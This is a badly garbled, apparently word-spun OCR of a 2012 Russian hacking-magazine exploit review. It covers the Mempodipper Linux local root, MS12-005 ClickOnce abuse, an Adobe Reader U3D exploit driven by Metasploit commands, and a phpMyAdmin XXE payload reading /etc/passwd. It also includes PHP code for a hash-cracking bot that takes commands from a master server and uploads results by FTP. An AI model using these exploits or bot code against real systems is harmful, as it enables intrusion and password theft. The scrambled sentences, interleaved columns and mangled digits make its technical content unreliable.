int match; rcu_read_lock(); match=(ptrace_parent(task)==current); rcu_read_unlock(); i f (match && ptra ce_may_access(task, PTRACE_MODE_ATTACH)) return mm;

При открытии интерфейса / pгoc/<PID>/me m вас полня ется таковский ко д :

static int mem_open( struct inode* inode, struct file * file) { file- >private_data=( void*)(( long)current->self_exec_id); file- >f_mode 0=FМODE_UNSIGNED_OFFSET; return е ;·

mmput(mm); return ERR_PTR(-EPERM) ;

Стало бы ть , для ноу-хау не имеется никаких ограни ч е н ий - какой угодно может это сде лать. Одн ако н а следовать пись да считка отдельные люди ограничения вс ё­ таки рот н овлены. Обратимся ко коду функции, которая осущест вля­

ет запис ь lприведена толит ьк что касается н аиболее важная делянка функции):

Чтобы следовать 14 сь пр ошла успешно, ее обязан выполнять либо своевольно

п роцесс ltask==сuггепtl, либо батяня , трассирующий настоящий про­

static ssize_t mem_write( struct file * file, const char user * buf, size_t count, loff_t * ppos )

цесс сквозь рtгасе . Волга зличные трюки не без; рtгасе малограмотный увенчались успехом,

позтому рассмотрим проект от task

==сuггепt. Чт об разве судебное дело непосредственно

ради пишет н олигодон ные нам данны е себя во память? Очевидно, зачем н штукарь во п ер­

вую цепочка интересуют процессы не без; атрибутом

! * ... *! struct task_struct * task=get_proc_task( file- >f_path.dentry- >d_inode);

/ * .. . *!

" уеееее

su: us er

mm=check_mem_permission(task); copied=PTR_ERR(mm); i f (IS_ERR(mm)) goto out_free;

!*

$ su

suid . Итиль ссмо т рим su:

haw I am а cowboy" haw I am а cowboy doe s not exist

уеееее

Л егко заметить, что-то н а stdeгг выдается вместе с тро ка, соз данная вместе с нашим

участием. Казалось бы, автор сих строк можем по части ткрыть /pгoc/< PID >/ mem , с п омощью lseeki) отрыть нужное площадь на памяти , со через dup211 связать шаблонный целый короб ошибок равным образом файловый дескриптор откры­

*/ i f ( file- >privat e_data !=( void *)( ( long) current->self_exec_id)) goto out_mm;

того / pг oc/< PID>/mem, застенографировать нужные данные, а вслед т ем исполнить шелл-код . Однако неграмотный всё этак просто. Здесь выполняется вторая про­ верка , на ходе которой текущее значительность

self_exec _ id вместе с равнива ется

со значением, не без; правая рука что до щью которого был соз дан файловый -де скри п ­

0* .. . * !

тор / pгoc /< PID>/mem. Значение self_exec_ id инкреме нтир уется при Здесь проводятся двум проверкидля предотвращения неавтори­ эованной записи: check_mem_peгmission равным образом

каждом запуске пр в рассуждении ц есса, оттого да мы из тобой малограмотный можем п олучи тьд оступ ко

self_exec_id. Функция check_mem_pe гmission является азбучная истина обер т который к __ check_

Тем безграмотный менее, эту проверку допускается перегнать : вместе с через foгkll автор сих строк созда­

памяти вышеизложенным способом.

mem_peгmission, во ч т насчёт симпатия делает:

ем потомица равным образом вн у три него из через execll не без; т артуем недавний процесс.

static struct mm_struct * __ check_mem_permission( struct tas k_str uct * task )

значению у предка . Когда да мы от тобой из-за п ускаем execll, sel f_exec_id увеличи­

Наш форкнутый пр по отношению ц есс имеет значе ни е

self_exec_id , равное ее

вается в еди книзу у. В нашем пото мке наша сестра открываем танцевальный шаг мя ть пр е д ка да

создаем файловый д ескриптор в целях /pгoc/<P ID пр е д ка>/mе m , полезно

struct mm_st ruct *mm;

в относительно т крытие пропал провер ок. В предке т ем временем следовать п ускаем

su

ч ерез execl l, таким образом урав н ивая значения self_exec_id. Д алее

mm=get_task_mm(task); i f (!mm) return ERR_PTR(-EINVAL );

от помощью, на правах выразился самовластно соз несомненно те ль экс плоита , <<о чень черной

магии со кетов молод икс» п е р е даем предк уо ткрытый файловый д е ­ скриптор ото п отомка равным образом возвращаемсяк вышеупомянутому сценарию

i f ( task

current) return mm;

dup2 -> ехес. Осталось понять, в соответствии с какому адресу действовать запись. По идее,

i f (task_is_stopped_or_traced(task)) {

ASLR

надо усложнить нашу следовать д а ч у, одначе взгляни получай это:

$ readelf -h / bin /s u 0 grep

Туре

Туре:

file)

ЕХЕС

(ExecutaЬle

Выв од нам вроде бы нам екает, который план

su использует не без; татич е­

ский а др есть сек ции .text !в ином случае был бы характер DYN, а отнюдь не Е Х ЕС) . Это означает, в чем дело?

su на большинстве дистрибутивов скомпи лиров ана Pl Е , со ледовательно, ASLR к секции .text ра бо­

помимо использования

жулик безвыгодный будет, что-то у проща ет царапание эксплоита.

И схо дный ко д эксплоита Mempodippeг д осту пен нате exgloit-db .com , EDB-10 08411 . Пр име р е г в отношении использования представлен возьми ск р равным образом нш о­ те.

it·!;lдJti Liпu x

>=2.6.39, 02-

равно 04-битные.

~i•J!Iiii•HI Д оверьобновлениеядрасвоемупакетномумене д жеруилиустанови Примерработыэксплоита

ХАКЕР ОЗ

/158/ 0012

Mempodipper

патч вручную.

057


ВЗЛОМ/ОБЗОРЭКСПЛОИТОВ

0

MS12-005 Уязвимость процесса сборки

следавательности действий, требуемых пользу кого запуска встроенного

·

СliсkОnсе-приложения не без; полными правами доступа IFull Tгustl. В результатевыполнения описанных ранее действий нате экране

~3

CVSSV2

011111 011 011 01 01 0

появится галерея диалоговых окон. Однако пользователю безвыгодный нужно

011 01

ни аза от ними уделывать .

[AV N/AC M /дu .N /C C/I.C/AC)

Custom Animation'ы выполняются, при случае

PoweгPoint работает на ре ж да м е показа слайдов. Когда PoweгPoint на­

[]IШ

ходится на полноэкранном режиме, за выполнения каждогодей­

Найденная9язвимостьпозволяетвыполнитьпроизвольныйкодна

ствия анимации происходит освежение фокуса. После запус~а

удаленной системесправами текущего пользователя. Для сего

СliсkОnсе-приложения наша сестра можем направлять сведения диалоговым

юзер уязвимой системы надо посетить получай предумышленно сфор­

окнам, чтоб створить их.

мированную wеЬ-страницу другими словами выявить сознательный обложка

Office.

Уязвимость присутствует во механизме безопасности

lj:JЦ!•Jii

Дело во том, почто

Уязвимость, описанная во

Object Packageг. Object Packageг считает ClickOnce-фaйл безопасным, благодаря чему обложка такого вроде дозволительно ввести во оригинал Office. Когда ламер уязвимой системы открывает документ, внедрен­

MS12-005, затрагивает неудовлетворительно аспекта: 1. Метод определения исполняемого файла. Непропатченный packager.dll определяет, является ли обложка испол­

ный обложка непроизвольно выполняется . Напомню, зачем

няемым, сопоставляя расширения файлов не без; элементами таблицы

ClickOnce- сие

!для комфорт назовем ее ехесЕхtТаЫе).

методика развертывания, позволяющая образовывать самообновляе­ мые приложения

Windows,

которые могутустанавливаться равно запу­

.text:02FA1098 execExtTaЬle dd offset а_ехе ; DATA XREF: CPack age: :_GetCurrentlcon(~I C ~ )~69 0 о .text:02FA1D98 ; CPackaEe: :_Giv ewarni n gMsg { НWND__ * ) +5Е \ о .text:02FA1D98 ; " .ех е ~ .text:e2FA1D9C dd offset а - com ; " . сот -' .text:e2FA1Dдe dd offset а bat ~ " .bat" . text:02FA1DA4 dd offset а lnk " . ln k" .text :e2FA1DA8 dd offset а - cmd " .cmd" " . pif" .text:e2FA1DAC dd offset a_pif .text:e2FA1DB0 dd offset а - scr " . scr" .text:e2FA1DB4 dd offset а _js ; ". js " .text:e2 FA1DB8 dd offset а _jse ; ". j :se " . text:e2FA1DBC dd offset a_vbs _; ". vbs" . text: e2FA10Ce dd offset а - vbe ; ". vbe" .text:e2 FA1DC4 dd offset a_wsh ; " .wsh" .text:e2 FA1DC8 dd offset a_sct ~ " . stt ' .text:e2 FA1DCC dd offset a_vb _; " .vb" .text:e2FA1DD0 dd offset a_wsc ; " .wsc '~'~

скаться близ минимальном вмешательстве пользователя . Существует три способа публикации приложения

ClickOnce: от веб-страницы,

общего сетевого ресурса либо носителя, скажем комок танцевальный шаг кт-диска . Его можно назначить в нейрокомпьютер конечного пользователя равным образом запустить локально, хоть когда пэвм невыгодный подключен ко сети, или — или метнуть

во оперативном режиме, минуя установки каких-либо компонентов возьми

субноутбук конечного пользователя. При этом приложения

ClickOnce

могутобновляться самостоятельно, проверяя наличиедоступных новых версий равным образом автоматично заменяя по сию пору обновленные файлы. Для реализации атаки во данном случае используем специальным

образом сформированный обложка презентации PoweгPoint. Эта про­

грамма позволяет наметить Custom Animation'ы с целью ОLЕ-пакетов . В орден с обычных анимаций, наша сестра можем задатьдве специфичные

чтобы OLE анимации [которые называются Object Actions): Activate

Contents [активировать содержимое) да Edit Package [редактировать пакет). При Activate Contents выполняются те а действия, что такое? и при двойном щелчке пользователя в соответствии с встроенному объекту. Таким

образом,

Custom Animation'ы позволяют совершать указанные весь

I!IEIEI

~ C:\Python27\python.exe О&мен

nакетами

Ответ Ответ Ответ

с

: возражение

от ОТ

через

от

lb.wo~dp~e ss .com

02.233.69.6: 72.233.69.6: 72.233.69.6: 72.233.69.6:

ЧИСЛО ЧИСЛО ЧИСЛО ЧИСЛО

[72.233.69.6] no 02

& а ~т=32 &а~т=32 &а~т=32 &а~ т=32

В ре 0·1Я вреt·1Я вреt·1Я вреt·1Я

~татистика Ping nля 02.233.69.6: Пакетов: отnравлено=4, nолучено Приблизительное срок nриема - nереnачи

0,

0

0

Минимальное

=2 00t·1C =166t1c =168t·1C =166t1C

во

а

&а~т:

ТТL=127 ТТL=127 ТТL=127 ТТL=127

nот е ряно

=0 (0%

nотерь),

мс :

=166мсек, Максимальное=240 м из ек, Ср е nне е=185 м сек

C:,tmp)nslookup exploitshop.wo~dp~ess.com Can' t f ind se1•ve1' nате fo1• add1•ess 092 .168. 0. 0: Non - e x i ste n t domain ~e~ve~: google - puhlic - dns - a.google.com rdd~ess: 8.8.8.8

0***

~on-autho~itative answe~: ~ame: lb.wo~dp~ess.com ~dd~esses: 74.200.243.251, 1

02.233.2.58, 02.233.69.6, 06.74.254.120 76.74.254.123, 04.200.244.59

rliases:

exploitshop.wo~dp~ess. c om

C:,tm

>

Ре зу льтат эксплуатацииуязви мости- забытый

058

Python- скри пт

ХАКЕР

03/1 08/2012


Обзор эксплоитов

.text:e2FA1DD4 dd offset a_wsf .text:e2FA1DD8 dd offset a_wmz

pdf-~rser.py -о 0В

".wsf" " .wmz "

"sr .pdr -r

Просто прокручиваем на цикле этутаблицу равным образом смотрим, имеет ли встроенный обложка такое но расширение, по образу да элементтаблицы. Д ля этого используется функционирование l s P гogiOinlist:

push llh ; int dangerousTaЬle push offset execExtTaЬle .text:e2FA72FB push es i ; pExtName .text:e2FA72FC push е ; int . text: e2FA72FE call ?I sProgiDinl ist@@YGHPBG0PBQBGI@Z Is ProgiDinlist(ushort const * ,ushort co nst * , ; ushort const * const * ,uint) .text:e2 F AПF4 .text:e2FA72Fб

Нюанс состоит на том, почто во таблице приведена всего только часть существующих расширений про исполняемых файлов. В качестве примера дозволено позаимствовать ру сиречь

pl. MS12-005 обходитэту проблемус по­

мощью функции AssoclsDangeгousl l , ко т орая проверяет расширения исполняемых файлов:

. text:e2FA6All push еах .text:e2FA6A12 call ds: __ imp__ AssocisDangerous@4 ; Assoc isDangerous(x) .text:e2FA6A18 test еах, еах . text:e2FA6Alд jnz short loc_2FA6A42

Вр е доно из так е от лошаденка ж равно м в рассуждении е 0D -о б ъекта на т е ле рdl - ф ай ла

А- наименование , подина которым должна присутствовать активирована реферат . РО- резюме должна активироваться, по образу токмо открывает­ ся страница, содержащая аннотацию возьми 0 D -данные.

lj:JЦ!e]ii Последовательностьзапу вместе с ка объектов :

0. Вывод предупре ж дени й системы бе з опасности пользователю . packager.dll выдает предупреждения, всего только если файл является исполняемым. Н что до рассмотрим функцию CPackage __ _ GiveWaгningMsgi H WND hWndl . Она ещё проходит в области табли ц е

Объект 0 - поступок OpenAction инициирует просьба к JavaScript. Объект 04-JavaScгipt ссылается в вещь 05. Объект 05- J avaScгipt-кoд применяеттехнику heap spraying,

ехесЕхtТаЫе, и, когда расколачивание встроенного файла никак не содержится

спустя время переходит сверху вторую страницу.

на ехесЕхtТаЫе, никаких предупреждений неграмотный выдается.

Объект 01-определение 0D-данных равным образом изображение их форматирова­

Пропатченный

ния.

Объект 0О - 0D-данные, которые будут представляться !вероятно, поврежденные!.

it·1;ldfjfi Windows ХР, Windows Vista, Windows Sегvег 0008 SP2, Windows 0.

fi•J!Iij[•J:I

Объект ы, н а которыеследуетобратить внима н ие :

Объект 0О -ссылается сверху именованные словари I/3D, /U3DI. Объект 01- ссылается сверху именованные словари I/3DI, /3DD, / 0D,

Существует обновление, устраняющее эту уязвимость.

/ 0DAI.

0

Уязвимость во Adobe UЗD-данных

Reader близ обработке

CVSSV2

00.0

01111 01 01 011 01 011111

011 0 IAV: N/АС: L/Au: N/ С: С/1: С/А: С)

0ШIШ

Уязвимость вызвана ошибкой присутствие обработке U 0D-данных. Такая ошибка может дать повод ко сбою. П ри усишко п ешной эксплуатации эта уязвимость позволяет злоумышлен ни ка м учредить полный контроль надсистем ой. Для обхода

DEP используется RОР-цепочка, icucnv36 .dll. Для обхода ASLR выполняет­ ся JavaScгipt-кoд, реализующий технику heap spraying. основанная в библиотеке

Кратко опишем U3D-компоненты, дабы выгодно отличается лошадь мать, какие из них используетсплоит:

Объект 05 - заключает JаvаSсгiрt-коддля реализации heap spraying равно перенаправления сверху вторую страницу !инициирует

судебное дело отображения 0D-данных ! . Сплоит реализован во Metasploit lпример вместе с полезной нагрузкой во виде запуска калькулятора):

msf > use explo i t/windows/fileformat/adobe_reader_uЗd msf e x plo i t(adobe_reader_uЗd) > set pay l oad win dows/exec payload=> windows/exec msf e x p l o it (adobe_ reader_uЗd) > set cmd calc . exe cmd=> calc . exe msf ex p l oit ( adob e_ r eader_uЗd ) > show options Module options (exploit/windows/ fi leformat/adobe_reader_uЗd): Name Cu r rent Setting Required Descr i ption

U3D- в обыдённый одну секунду лишь п оддерживаемый под­ тип да 0D - объект.

F I L ENAМE

0DD lнеобходимl - определяе т река иначе конкорданс не без; 0D-данными,

OBFUSCATE

0DA lнеобязателенl - словарьактивации, детерминирующий время,

msf.pdf false

yes по

The file name Е nаЫе JS obfuscation

подлежащими рендерингу.

если нелишне изъявлять 0D-данные .

Payload options (windows/exec): Name Current Setting Requ i red

Description

0D I Iнеобязателенl - п еременная логического т ипа, определяю­ щая центральный нагрузка использования . Значение tгue соответствует интерактивному режиму,

DIS lнеобязателенl- имя, определяющее имущество 0D-данных придеактивации.

ХАКЕР ОЗ/ 0 0 0/ 0 01 0

CMD

calc.exe

yes

EXITFUNC

process

yes

false- взаимодействию чрез JavaScript.

The comma nd string to execute Exit tec hni que: seh,thread,process,none

059


ВЗЛОМ/ОБЗОРЭКСПЛОИТОВ

Explpit target: Id Name е

<!ELEMENT foo ANY > <!ENTITY bar SYSTEM "file: /// etc / passwd" >

Adobe Reader 0.4.0 / 0.4.5 / 0.4.6

оп

Win

ХР SРЗ

msf exploit(adobe_reader_uЗd) > exploit [*] Creating 'msf.pdf' file .. . [+]

msf.pd~

> <foo>&bar;</foo>

stored at /home/pikofarad/.msf4/local/msf.pdf Здесь оnределяется nримитив Ьаг, какой-никакой ссылается сверху обложка /et€/

i'·'.J1Jfi

passwd, да nри обработкедокумента его начинка включается

Adobe Read eг 0.4.0 09.4.5 09.4.6 около Windows ХР SP3.

во него. Кстати говоря, во ХМL-документ допускается далеко не только лишь вливать

локальные да удаленные файлы.

,_i,J!Iiii•J:I

В нем позволено вонзать исполняемые файлы, даже если парсеру раз­

заметано сие деять . По стандарту сие выглядит nримерно приблизительно :

Существует обновление, устраняющее эту уязвимость.

'

c?xml version="1.0 " encoding="utf-8" ?> < ! DОСТУРЕ foo

LFI во phpMyAdmin после ХХЕ-инъекцию

[

CVSSV2

<! ELEMENT foo ANY> <!NOTATION GIF SYSTEM "http: // my-cool-site.com/ ShowGif.exe" > с! ЕNПТУ bar SYSTEM "http ://not-my-cool-site.com/ bar.gif" NDATA GIF >

0.0

011111 011 011 011 01111

011 [AV:N/АС: L/Au :N/C : Р/1 :N/A:N 0

[DШ В начале лета изыщик Магсо Batista опубликовал весьма интереснуюуяз вимо из тьтипа Loca l File lncluding. Эксnлуатируется

возлюбленная нетривиально, чрез ХХ Е-инъекцию [ХХЕ -ХМ L eXteгnal Entity],

> cfoo>&bar; c/foo >

которая представляетсобой вариант ХМ L-инъекции .

Напомню , сколько nри nомощи ХМL-инъекции [например, GЕТ­

В этом документе со п омо щью программы ShowGif.exe обрабатыва­

запроса ко веб-серверу] допускается видоизменить содержание ХМL­

ется иллюстрация baг.gif. В некоторых случаях автор сих строк можем насадить nо­

документа. Обычно выигрыш представляютфайлы базы данных

добную конструкцию вследствие ХМ L-и нъекцию равным образом провести в жизнь требуемый

xmiOB, гд е содержится уведомление об пользователя х:

код. Более подробная ан фа об ХМ L-инъекциях очищать для сайте OWASP

[goo.gi/BBG9C ]. c?xm l version="l . e" encoding="IS0-8859-1" ?> cusers > cuser > cusername> gandalf c/username> <password> !cЗ </password>

cuserid >0</user id > cmai l> /mail> </user>

lj:J4!•Jij В phpMyAdmin имеется в наличии цель имnорта базы данны х с заданного пользователем ХМ L-фа йла. Уязвимос ть заключается во том, что-нибудь по­ сле загрузки спецом сформированного ХМL-документа атаку­

ющий получает осуществимость [ограниченную nравами веб - сервера] прочит ать nрои зво льный обложка во системе иначе говоря локальной сети.

Уязвимос ть получи хо дится на файле l ibгaгies\impoгt\x m l .php, где функция simplexml_load_stгing[] вызывается без участия проверки для су ще­

<user> cu sername> Stefane c/ username> cpa ssword> wlsЗc </password>

cuser id >500 </userid> cmail >Stefane@whysec . hmm </mail> </user>

ствование ссылки получи и распишись неглубокий примитив:

$xml=simplexml_load_string($buffer, "SimpleXMLElement"J LIBXML_COMPACТ); Патченные версии phpMyAdmin пользу кого предотвращения инъекции

используют функцию l ibxml _disaЫe_e ntity_loadeг[], вовремя нежели за­

<user >

гружать ХМ L-документ.

Компания SECFORCE разработала часть ко Metasploitдля экс­

< usernaшe> tony </username> <passwor d > UnбR34kЬ!e </ password >

cuserid> 000 </userid> cmail> s4tan@hell . com</mail> c/user> </ users >

плуатацииэтойуязвимости.ОнавтоматизируетnроцессLFiследую­ щи м образом:

0.

Логинится на phpMyAdmin не без; через предоставленных реквизи­ тов.

0.

СоздаетХМL-документ, применяя ХХЕ-инъекции интересах заданного файла.

Смышленый посетитель сверх труда nроведет аналогию не без; SQLинъекциями, а аз многогрешный тем временем nерейду напрямую для инъек­

0. 4.

Загружаетфайл сХМL-документом .

Пол у чаетуказанный обложка вместе с серве ра.

циям подтипа ХХЕ . В судоремонтный завод ументах ХМ L существуюттак называемые

примитивы [entities], которые объявляются на начале судоремонтный завод уме нта на об­

Возможные оnции эксnлоита равно nример успешной эксплуатации объединение ­

ласти ОТО. Существует изрядно видов близ м итивов, однако в тот же миг нас

казаны возьми скриншоте.

интересуюттолько внешние [e xteгnal entities]. Если на определении примитива присутствует URI, в таком случае дьявол называет не без; аз многогрешный внешним. Соответ­ ственно, парсер приходится получитьдоступ для этому URI да запустить его со держимое во документ, кабы сие было задано, например, так:

c?xml version="1.0" encoding="utf-8" ?> < !DOCTYPE foo

060

if.1;Jдjfi PhpMyAdmin 0.4.х

вnлоть поперед 0.4.7. 0 равно 0.3.х вплоть по 0.3. 00.5.

f'·'••••t·'a

Обновиться самое меньшее вплоть до вер эти phpMyAdmin 0.4.7. 0 [3 .3.1 0.5] другими словами

установи ть соо тветствующий патч . ::х::

ХАКЕР

03/158/2012


хакинг

lqbzllhttp ://essenzo.netl ·

ows КОДИМ БОТА_АЛЯ РАСПРЕДЕЛЕННЫХ ВЫЧИСЛЕНИИ Существует огромное количество bjt.ly/WdbrO -

языков программирования.

cлoвapи на брута

Кто-то выбрал к себя С, кто­ то-

ASM,

а кто-то-

Python.

Я,

например, отдал избрание

с Античата;

ш~ единовластно изо консольных

брутеров;

www.l2ko.de кoнвepтep батников.

невыгодный самому экзотическому

языку- РНР. А всё потому, что ми чаще надобно

На нашем диске ты сможешь отрыть

нести протоколы и заботы вместе с вебом, нежели

по сию пору необходимые

вместе с десктопом. Но бывают равно такие

файлы равно исходники, описанные на статье.

моменты, в некоторых случаях тебе нужен специализированный софт, а его просто-напросто нет.

00 U SPEAK ENGLISH? NO,

РНР

Однажды. вот период очередных ковыряний дежурный

XSS,

ко ми

на лаги попал хеш движение рулон ваш покорный слуга администратора нужного ми ресурса. Ко­ нечно же, его нельзя не было расшифровать, равным образом автор приёмом обратился к различным онлайн-сервисам, помогающим со расшифровкой. Ни единолично изо них ми неграмотный помог. С этой душевной печалью аз многогрешный отправился возьми ха к-форумы, идеже

на специальных разделах оставил просьбу по отношению помощи на расшифров­ ке. Но равным образом после этого меня ожидал фейл. Однако сайтик был сполна изо себя расчудесный, да брызгать его админку ми отнюдь невыгодный хотелось. Заварив очередную кружку кофе, автор этих строк начал думать, что поступить. Брутить получай своей машине никак не получилось бы- сердце компьютера слабоват. Значит, нужно было в круглых цифрах одолжить нотбук со хорошими характе­

ристиками, равно полезно безграмотный один. Покупать себя к родным пенатам

00

новых

мощных серваков из-за расшифровки одного хеша однова отнюдь не входи­ ло во мои планы. Поэтому ваш покорнейший слуга купил изрядно выделенных серверов для распределения вычислений у одного хостера. Осталось всего ничего- настроить расшифровку. И вона туточки моя персона решил уйти

062

ХАКЕР

03/158/2012


РНР-бот про

Windows

Комnилим кавасаки

на процесс. А n об чему бы отнюдь не настрочить бота, пр равно н им ающего команду

function mySettings()

бери расшифровку хеш а вместе с общего сервера? М ож н по части б ыло равно написать,

{

лишь только во положение заключалась во том, аюшки? автор этих строк з н ал всего лишь скрипто­

$settings=file_get_contents( 'http://adres.com/?do=mysettings' ); if ($settings !='' )

вые языки, а от десктопом отродясь невыгодный имел -де л а . И здесь на моей памя­ ти всплыла такая вещь, вроде всевозм что до жные р hр 0 е х е-компиляторы.

{ ОБЩАЯ СХЕМА

list($status, $statusdata) explode( ' 0' , $settings, 0 ); $config=array ( 'status'=> $status, 'data'=> $statusdata); return $config;

Бота мы решил вынудить сказываться по мнению в полном смысле слова определенному плану. Итак , существует сервер, держи для касательно торый добавляются << За­ дания » . Боты отстукивают держи него каждые пятеро минут, проверяя, не появилось ли интересах них новое задание.

И когда появилось, посылают серверу сообщение касательно том, в чем дело? б рут

начался. Сервер, на свою очередность , добавляет во базу партитура что до том,

else return false;

кто такой работает, а кто- нет. После завершения Брута ботик отправляе т серверу интерпелляция не без; уведомлением, сколько занятие окончена. Этот вопрос

опять же может охватывать расшифровку. При этом нужно произвести так, Эта ф у н ко ция обращается для нашему гейту, ловит ответ, и, когда

дай тебе боты использовали небо и земля словари про брутфор са , что-то около как брутить одиночный равно оный но словарник бесчисленно присест прямо невыгодный имеет смысла. Также годится учесть, что-нибудь хеш ей может фигурировать много, следственно я

дьявол неграмотный п у ст ой , делит его в двум части там, идеже вкушать обозначение

0.

Первая

делянка представляет лицом команду в целях бота, а вторая- допол­

далеко не станем перебрасывать круглый азбуковник вследствие брутфорс к каждого с них.

нительные сведения для того этой команды. Теперь напишем функцию

В процессе б рута наш брат будем приёмом а сравнивать результаты со все-

брутфорса получай основе заданных на виде аргумента хешей [массив) :

ми хешами, которые нужно расшифровать. Вообще, скрипт будет иметь только ряд функций равно выступит, приблизительно сказать, на качестве

function bruteHashes($hashes)

обертки [шедулера), << дергающей>> ранее самостоятельно брутфорсер. Именно

{

вследствие чего нам нужно подобрать такого типа брутфорсер, что работает

/1 Сохраняем хеыи ради брутера file_put_contents( './brute.txt' , implode( "\r\n" , $hashes));

от консоль, круглым счетом что ниже автор переведем скрипт вехе, который тоже работает во консольной среде. Я использовал наработку моего знакомого- возлюбленная имеет такого типа синтаксис:

mdS.exe

{файл хешей} {файл словаря} {где сохранять}

Здесь узловой параметр-это заглавие файла вместе с хешами ради

брутфорса [один хеш=одна строка), следующий параметр-название

// Говорим серверу, что такое? я сделано работаем file_get_contents( 'http://adres.master .servera.com/?do=iamworking' ); /1 Брутим passthru( 'mdS.exe brute.txt vocabulary.txt results.txt' );

файла со словарем, а концевой параметр-название файла, в какой-никакой брутер довольно вносить результаты . Задачи серве­ ра- согласно правилам учредить бота, подчас стирать рабочую

Сохраняем резу

$uploader

ьтат

бери

сервере

no

Ф

r

=ftp_connect( 'ftp://adres.master.servera.com' );

папку, а да отдавать сигналы что касается том, что-нибудь эпоха бы уж начать б рут за таким-то хешам. Для основные положения напишем функцию обращения к серверу чтобы получения текущего задания:

ХАКЕР

03 /158/2 012

ftp_login($uploader, 'login' , 'password' ); ftp_put($uploader, './results/' .time(). ' .txt' ,

063


взлом -

'./results.txt' , FTP_ASCII);

Q

&~~

ftp_close($uploader); //

Говорим серверу,

-

-

Bat Т по части Ехе Converter v1. 0

~(g] r8J

'~============~==============~l c=J c=J

~~'

.....-........

L __ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _

-~

аюшки? автор сих строк закончили

0---

file_get_coпteпts(

Visblty

'http://adres.•aster.servera.com/?do=iamfinished' ); }

\VorЬ-Iodir~tory

@ anontdirodory о т..._...,-

о---

Итак, занятие беретик на качестве аргумента скопление от хе шами

ЕлаурЬоn

равно сохраняет его на удобоваримом ради брутера формате, ведь лакомиться

0Et><тn>tlheor<I!J'10'

·-l

во виде текстового файла, во каждой строке которого находится один хеш. Затем ботик стучит в сервер из сигналом об том, который начал

работать. Это нужно пользу кого того, ради сер вер далеко не записывал бота в <<мерт вые >> машины, разве спирт малограмотный бросьте выстукивать каждые пяточек

0 Addv.sta _ _ _

минут !тайм-аут объединение умолчанию), равно помнил , зачем ботик функционирует.

0 Adddeaщ>ieo'

Далее заводим самого бота, указав ему ремилитаризованный обложка хе ш ей,

Oo..r.nte-Res

определяемый лексикон да обложка пользу кого сохранения результатов . Соз­

P.w~ter:

даем вдобавок функцию <<ус тановки >> бота. Установка представляет собой обкатывание равно последующее оставление словаря, согласно которо­

С-'<

му нужно брутить: fuпctioп iпstallVocab{)

....t

01

Exit

01

Компилим блузка дпя скрытного запуска брутера

{

$vocabulary=file_get_coпteпts( 'http://adres.com/unique_vocabulary.php' ); file_put_coпteпts( './vocabulary.txt' , $vocabulary);

да опять-таки запускаем шедулер. Нужно учесть, ась? обложка словаря не­

обходим сделано быть первом обращении ко серверу, того сделаем предохранитель, какой-никакой подготавли вает словар ь равным образом запускает шедулер :

Серверный из крипт, ко которому обращается бот, принуждён воз­

крутить удивительно уникальные словари, дай тебе у каждой

if (!file_exists( './vocabulary.txt' ))

механизмы был родной <<с ловарный запас>>. Также стои т оставить возможно сть трансформировать лексикон из через команды, отправляемой

iпstallVocab();

чере з мастер-сервер . Теперь а нам что поделаешь накадит ь самую

} startScheduler();

главную функцию- функцию шедулера, выполняющую также команды мастер-сервера. Объем статьи неграмотный позволяет дать толчок

компилим

тогда адрес этой функции полностью, вследствие чего укажу как только ее кейсы

!полный адрес ищи в нашем диске):

Теперь, когда-когда да мы от тобой объединили всё сие на сам файл, накануне нами

Ьгutе-брут;

встает поручение организовать изо него полновесный ехе. В этом нам по­

сlеап- очистка данных , полученны х на результате предыдущих

может небольшая тулза от длинным названием

брутфорсов;

Compileг/Embeddeг.

iпstаll-установка;

Bamba lam

РНР ЕХЕ

Она представляет внешне билдер, тот или иной создает ехе изо РНР­

фай ла. Билдер из-за всё срок его использования ни разу безвыгодный подво­

ехit-выход.

дил, работал отлично, минуя всяки х ба го на !респект авторам!). Этот билдер позволяет компи плескать экзешники вроде с целью РНР

По дефолту шедулер находи тс моя особа во режиме ожидания команд . В качестве тайм-аута наша сестра указали

000

0.0, этак

равно про

паче новых версий интерпретатора. В простейшем случае компи­

секунд. Это временной

пропуск обращения б от во ко нашему серверу. Далее пусть будет так пуск

ляция на

Bambalam

выглядит во так:

команд вместе с учетом данных , переданных сервером боту, вдобавок по­

сле выполнения команды автор делаем пау зу lв некоторых случаях)

bamcompile

[-optioпs]

iпfile.php

[outfile . exe]

ОБЗОР КОМПИЛЯТОРОВ ИНТЕПРЕТИРУЕМЫХ ЯЗЫКОВ ПРОГРАММИРОВАНИЯ

0

РНР

bl

DeveiStudio

M<~miS4r

Однозначный начальник

0

Php2exe tmJylyi'{4Y_R

0

Bambalam Embedder Ьit.ly/wpSпiZ .

'

ру2ехе

Ьit.ly/3~

lilli..Y!:

0

Peri2Exe Ьit.ly/y29qШ

Преобразует первообразный

Более сильный инструмент,

Позволяет составлять

соответственно конвертированию РНР­

адрес в РНР во исnолняемый

безвыгодный имеющий

скрипты,написанные

перевода перловки вехе .

скриптоввполноценные

файл. Чтобысозданное

интерфейса равным образом позволяющий

возьми Питоне, на экзешники.

Создает независимый исполняемый обложка ,

GUI-

Отличный механизм на

nрограммы . Тут

nриложемне могло

танцевальный шаг выковывать из первых рук во рента .

Помимо исполняемого

да визуальная круги

запуститься, на праздник а

Также комnилирует целые

файла, создаетнесколько

что работает во любых

программирования,

директории должна

проекты со исnользованием

библиотек, помогающих

системах равно отнюдь не требует

равным образом организация кода,

бытовать библиотечка

различных библиотек,

готовой программе

интерпретатора .

да введение различных

php5ts.dll.

наnример

заnуститься .

cURL.

модулей равно многое другое .

ХАКЕР

03/158/2012


РНР-бот ради

Windows

Сервис cmdS.ru предлагает Вам имущество проверки стойкости различных видов хеш-кодов (SНAl, З2 b1t MDS, MD4, mysql и т .д.). Наша шатия-братия занимается вопросами компьютерной безопасности со 0006 года. База данных самая большая во мире

равно бери настоящий праздник включает рядом

0,800,000,000,000 записей, 05% 50 Терабайт•

данных распределен в соответствии с кластеру равным образом составляет

Пожалуйста Зарегистрируйтесь иначе говоря Автошчуйтесь

.

-

....

с которых уникальны. Суммарный количество

. . -;. ·-f.,~ Сервис бери базе распределенных вычислений ради расшифровки МD5-хешей

Итак, кавасаки готов. Теперь займемся сервером. Во-первых, нужно зафиксировать во базе те боты, которые успешно отстучали нам

проходит до по всем статьям файлам на папке гesults, попеременно открывает их равно добавляет на базу.

х отя бы единолично раз, ведь есть, приблизительно сказать, установленные боты. Для

